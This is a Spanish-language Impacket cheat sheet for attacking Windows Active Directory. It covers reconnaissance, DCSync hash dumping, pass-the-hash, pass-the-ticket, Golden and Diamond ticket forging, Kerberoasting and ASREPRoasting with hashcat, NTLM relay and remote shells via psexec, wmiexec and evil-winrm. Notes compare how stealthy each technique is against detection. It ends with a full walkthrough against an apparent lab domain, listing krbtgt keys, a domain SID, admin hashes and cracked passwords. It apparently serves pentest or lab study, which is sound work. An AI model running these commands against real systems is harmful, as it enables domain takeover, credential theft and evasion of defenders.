
================================================================================
IMPACKET CHEATSHEET + DIAMOND & FORGED TICKETS + KERBEROASTING
================================================================================

--------------------------------------------------------------------------------
RECONOCIMIENTO
--------------------------------------------------------------------------------
# Descubrimiento de hosts
nmap -sn <RED>/24

# Puertos clave Windows/AD
nmap -sV -p 88,389,445,3389,5985 <IP>

# Identificar hostname de una IP
nmblookup -A <IP>

# OS Discovery via SMB
nmap -p 445 --script smb-os-discovery <IP>

Puerto 88  → Kerberos   → indica DC
Puerto 389 → LDAP       → indica DC / AD
Puerto 445 → SMB
Puerto 3389→ RDP
Puerto 5985→ WinRM

--------------------------------------------------------------------------------
CONFIGURACION KERBEROS EN KALI (/etc/krb5.conf)
--------------------------------------------------------------------------------
[libdefaults]
    default_realm = DOMINIO.LAB
    dns_lookup_realm = false
    dns_lookup_kdc = false

[realms]
    DOMINIO.LAB = {
        kdc = <IP_DC>
        admin_server = <IP_DC>
    }

[domain_realm]
    .dominio.lab = DOMINIO.LAB
    dominio.lab = DOMINIO.LAB

# /etc/hosts
echo "<IP_DC>     DC.dominio.lab dominio.lab DC"      | sudo tee -a /etc/hosts
echo "<IP_TARGET> TARGET.dominio.lab TARGET"           | sudo tee -a /etc/hosts

================================================================================
FORMAS DE ACCESO — RESUMEN
================================================================================

Tienes...                    Tecnica              Comando
─────────────────────────    ──────────────────   ──────────────────────────────
usuario + contraseña         Acceso directo       psexec user:'pass'@IP
usuario + hash NTLM          Pass-the-Hash        psexec user@IP -hashes :NTLM
ticket .ccache               Pass-the-Ticket      psexec -k -no-pass user@FQDN
hash AES256 krbtgt + SID     Golden Ticket        ticketer → ccache → PTT
hash AES256 krbtgt + SID     Diamond Ticket       ticketer -extra-pac → PTT
hash NTLM cuenta servicio    Kerberoasting        crackear → contraseña en claro

================================================================================
PASOS PREVIOS SEGUN LO QUE NECESITAS
================================================================================

--------------------------------------------------------------------------------
[A] PARA PASS-THE-HASH → necesitas hash NTLM del usuario
--------------------------------------------------------------------------------
# Opcion 1: DCSync (necesitas admin en el DC)
impacket-secretsdump <dominio>/<user>:'<pass>'@<IP_DC> -just-dc-user <objetivo>
impacket-secretsdump <dominio>/<user>@<IP_DC> -hashes :<NTLM> -just-dc-user <objetivo>

# Opcion 2: Dump SAM local (necesitas acceso a la maquina)
impacket-secretsdump <dominio>/<user>:'<pass>'@<IP_TARGET>

# De la salida: <user>:<RID>:<LM>:<NTLM>:::
# El NTLM es el ultimo campo antes de :::
# LM vacio siempre = aad3b435b51404eeaad3b435b51404ee

--------------------------------------------------------------------------------
[B] PARA PASS-THE-TICKET → necesitas ticket .ccache
--------------------------------------------------------------------------------
# Opcion 1: Pedir TGT con credenciales
impacket-getTGT <dominio>/<user>:'<pass>' -dc-ip <IP_DC>
impacket-getTGT <dominio>/<user> -hashes :<NTLM> -dc-ip <IP_DC>

# Opcion 2: Generar Golden/Diamond Ticket (ver secciones abajo)

# Opcion 3: Convertir ticket de Mimikatz/Rubeus
impacket-ticketConverter ticket.kirbi ticket.ccache

# Cargar y verificar
export KRB5CCNAME=<ticket>.ccache
klist
kdestroy   # para borrar

--------------------------------------------------------------------------------
[C] PARA GOLDEN / DIAMOND TICKET → necesitas hash krbtgt + SID dominio
--------------------------------------------------------------------------------
# Paso 1: DCSync para obtener krbtgt (necesitas admin en DC)
impacket-secretsdump <dominio>/<user>:'<pass>'@<IP_DC> -just-dc-user krbtgt

# De la salida anotar:
#   krbtgt:502:LM:NTLM:::
#   krbtgt:aes256-cts-hmac-sha1-96:<AES256>   ← este es el importante

# Paso 2: Obtener SID del dominio y RIDs
impacket-lookupsid <dominio>/<user>:'<pass>'@<IP_DC> | head -20

# De la salida anotar:
#   [*] Domain SID is: S-1-5-21-XXXX-XXXX-XXXX   ← SID del dominio
#   500: Administrador                             ← RID admin
#   512: Admins. del dominio                       ← GID Domain Admins
#   519: Administradores de empresa                ← GID Enterprise Admins

--------------------------------------------------------------------------------
[D] PARA KERBEROASTING → necesitas cualquier usuario del dominio
--------------------------------------------------------------------------------
# Paso 1: Listar SPNs disponibles
impacket-GetUserSPNs <dominio>/<user>:'<pass>' -dc-ip <IP_DC>
impacket-GetUserSPNs <dominio>/<user> -hashes :<NTLM> -dc-ip <IP_DC>

# Paso 2: Pedir tickets y guardar hashes
impacket-GetUserSPNs <dominio>/<user>:'<pass>' -dc-ip <IP_DC> -request -outputfile hashes_kerberoast.txt

# Paso 3: Identificar tipo de hash
#   $krb5tgs$23$ → RC4    → hashcat -m 13100  (mas facil)
#   $krb5tgs$17$ → AES128 → hashcat -m 19600
#   $krb5tgs$18$ → AES256 → hashcat -m 19700  (mas dificil)

# Paso 4: Crackear
hashcat -m 13100 hashes_kerberoast.txt /usr/share/wordlists/rockyou.txt
hashcat -m 13100 hashes_kerberoast.txt --show
john --format=krb5tgs hashes_kerberoast.txt --wordlist=/usr/share/wordlists/rockyou.txt

================================================================================
IMPACKET - FLAG -hashes (PASS-THE-HASH) ← MUY IMPORTANTE
================================================================================
# Formato: -hashes <LM>:<NTLM>
# LM casi siempre vacio → aad3b435b51404eeaad3b435b51404ee
# Se puede omitir el LM → :<NTLM>

impacket-secretsdump  <dominio>/<user>@<IP>     -hashes :<NTLM>
impacket-psexec       <dominio>/<user>@<IP>     -hashes :<NTLM>
impacket-wmiexec      <dominio>/<user>@<IP>     -hashes :<NTLM>
impacket-smbexec      <dominio>/<user>@<IP>     -hashes :<NTLM>
impacket-smbclient    <dominio>/<user>@<IP>     -hashes :<NTLM>
impacket-lookupsid    <dominio>/<user>@<IP>     -hashes :<NTLM>
impacket-GetUserSPNs  <dominio>/<user>@<IP_DC>  -hashes :<NTLM> -request
impacket-GetNPUsers   <dominio>/<user>@<IP_DC>  -hashes :<NTLM> -request
impacket-getTGT       <dominio>/<user>          -hashes :<NTLM> -dc-ip <IP_DC>

================================================================================
IMPACKET - EJECUCION REMOTA (TODAS LAS FORMAS)
================================================================================

--------------------------------------------------------------------------------
PSExec → da shell SYSTEM, necesita SMB (puerto 445)
--------------------------------------------------------------------------------
impacket-psexec <dominio>/<user>:'<pass>'@<IP>              # contraseña
impacket-psexec <dominio>/<user>@<IP> -hashes :<NTLM>       # hash NTLM (PTH)
impacket-psexec -k -no-pass <dominio>/<user>@<FQDN>         # ticket (PTT)

--------------------------------------------------------------------------------
WMIExec → mas sigiloso, no crea servicio
--------------------------------------------------------------------------------
impacket-wmiexec <dominio>/<user>:'<pass>'@<IP>
impacket-wmiexec <dominio>/<user>@<IP> -hashes :<NTLM>
impacket-wmiexec -k -no-pass <dominio>/<user>@<FQDN>

--------------------------------------------------------------------------------
SMBExec → alternativa a PSExec
--------------------------------------------------------------------------------
impacket-smbexec <dominio>/<user>:'<pass>'@<IP>
impacket-smbexec <dominio>/<user>@<IP> -hashes :<NTLM>
impacket-smbexec -k -no-pass <dominio>/<user>@<FQDN>

--------------------------------------------------------------------------------
WinRM → puerto 5985
--------------------------------------------------------------------------------
evil-winrm -i <IP> -u <user> -p '<pass>'
evil-winrm -i <IP> -u <user> -H <NTLM>

--------------------------------------------------------------------------------
RDP → acceso grafico (NLA debe estar deshabilitado para PTH)
--------------------------------------------------------------------------------
xfreerdp /u:<user> /d:<dominio> /p:'<pass>' /v:<IP>
xfreerdp /u:<user> /d:<dominio> /pth:<NTLM> /v:<IP>

================================================================================
IMPACKET - GENERACION DE TICKETS
================================================================================

--------------------------------------------------------------------------------
FORGED TICKET (GOLDEN TICKET)
--------------------------------------------------------------------------------
# Genera TGT offline firmado con clave krbtgt
# DETECTABLE: no hay AS-REQ en logs, duracion 10 años

impacket-ticketer \
  -domain <dominio> \
  -domain-sid <SID_DOMINIO> \
  -aesKey <AES256_krbtgt> \
  -user-id 500 \
  -groups 512,519 \
  Administrador

export KRB5CCNAME=Administrador.ccache
impacket-psexec -k -no-pass <dominio>/Administrador@<FQDN_TARGET>

--------------------------------------------------------------------------------
DIAMOND TICKET
--------------------------------------------------------------------------------
# Pide TGT legitimo al DC, lo descifra, modifica y re-cifra
# MAS SIGILOSO: hay AS-REQ real en logs, duracion estandar del dominio

impacket-ticketer \
  -domain <dominio> \
  -domain-sid <SID_DOMINIO> \
  -aesKey <AES256_krbtgt> \
  -user-id 500 \
  -groups 512,519 \
  -extra-pac \
  Administrador

export KRB5CCNAME=Administrador.ccache
impacket-psexec -k -no-pass <dominio>/Administrador@<FQDN_TARGET>

--------------------------------------------------------------------------------
COMPARATIVA GOLDEN vs DIAMOND
--------------------------------------------------------------------------------
                    GOLDEN TICKET           DIAMOND TICKET
Generacion          Offline                 Online (TGT legitimo modificado)
AS-REQ en logs      NO  ← detectable        SI  ← limpio
Duracion ticket     10 años ← alerta        Estandar del dominio ← limpio
Clave necesaria     AES256 krbtgt           AES256 krbtgt
Flag extra          (ninguno)               -extra-pac
Dificultad detec.   Mas facil               Mas dificil

================================================================================
IMPACKET - OTROS MODULOS UTILES
================================================================================
# LDAP dump (usuarios, grupos, GPOs)
impacket-ldapdomaindump <dominio>/<user>:'<pass>'@<IP_DC>

# ASREPRoasting (usuarios sin pre-autenticacion Kerberos)
impacket-GetNPUsers <dominio>/<user>:'<pass>' -dc-ip <IP_DC> -request
hashcat -m 18200 hashes_asrep.txt /usr/share/wordlists/rockyou.txt

# SMB - listar y navegar shares
impacket-smbclient <dominio>/<user>:'<pass>'@<IP>
impacket-smbclient <dominio>/<user>@<IP> -hashes :<NTLM>
# shares / use <share> / ls / get <file> / put <file>

# NTLMRelay
impacket-ntlmrelayx -t <IP_TARGET> -smb2support

================================================================================
PROCESO COMPLETO - ENTORNO REAL (silentforce.lab)
================================================================================
ENTORNO:
  Kali          → atacante
  10.0.2.4      → LABDC.silentforce.lab          (DC, Win Server 2016)
  10.0.2.5      → WIN-SERVER2012.silentforce.lab  (objetivo)
  Dominio       → silentforce.lab
  Usuario       → sergio / abc123..

CREDENCIALES OBTENIDAS:
  krbtgt  NTLM:   8f965951fd8ffcd03d02588aac976cc0
  krbtgt  AES256: f35ed6245545592f44a3282d0111298cdd4afdab085e57fd32041412313dabae
  SID:            S-1-5-21-2717684102-2105335624-1964840543
  Admin   NTLM:   3e45171bc9c91d797d4c561b648ec753
  Admin   pass:   abc123.. (crackeada via Kerberoasting)
  sql_svc pass:   abc123.. (crackeada via Kerberoasting)

--------------------------------------------------------------------------------
VIA 1 - CONTRASEÑA EN CLARO
--------------------------------------------------------------------------------
impacket-psexec silentforce.lab/Administrador:'abc123..'@10.0.2.5

--------------------------------------------------------------------------------
VIA 2 - PASS-THE-HASH (NTLM)
--------------------------------------------------------------------------------
impacket-psexec silentforce.lab/Administrador@10.0.2.5 -hashes :3e45171bc9c91d797d4c561b648ec753

--------------------------------------------------------------------------------
VIA 3 - FORGED TICKET (GOLDEN TICKET) → Pass-the-Ticket
--------------------------------------------------------------------------------
impacket-ticketer -domain silentforce.lab \
  -domain-sid S-1-5-21-2717684102-2105335624-1964840543 \
  -aesKey f35ed6245545592f44a3282d0111298cdd4afdab085e57fd32041412313dabae \
  -user-id 500 -groups 512,519 Administrador
export KRB5CCNAME=Administrador.ccache
impacket-psexec -k -no-pass silentforce.lab/Administrador@WIN-SERVER2012.silentforce.lab

--------------------------------------------------------------------------------
VIA 4 - DIAMOND TICKET → Pass-the-Ticket
--------------------------------------------------------------------------------
impacket-ticketer -domain silentforce.lab \
  -domain-sid S-1-5-21-2717684102-2105335624-1964840543 \
  -aesKey f35ed6245545592f44a3282d0111298cdd4afdab085e57fd32041412313dabae \
  -user-id 500 -groups 512,519 -extra-pac Administrador
export KRB5CCNAME=Administrador.ccache
impacket-psexec -k -no-pass silentforce.lab/Administrador@WIN-SERVER2012.silentforce.lab

--------------------------------------------------------------------------------
VIA 5 - KERBEROASTING → contraseña en claro → acceso
--------------------------------------------------------------------------------
impacket-GetUserSPNs silentforce.lab/sergio:'abc123..' -dc-ip 10.0.2.4 \
  -request -outputfile hashes_kerberoast.txt
hashcat -m 13100 hashes_kerberoast.txt /usr/share/wordlists/rockyou.txt
hashcat -m 13100 hashes_kerberoast.txt --show
# → Administrador:abc123.. / sql_service:abc123..
impacket-psexec silentforce.lab/Administrador:'abc123..'@10.0.2.5

================================================================================
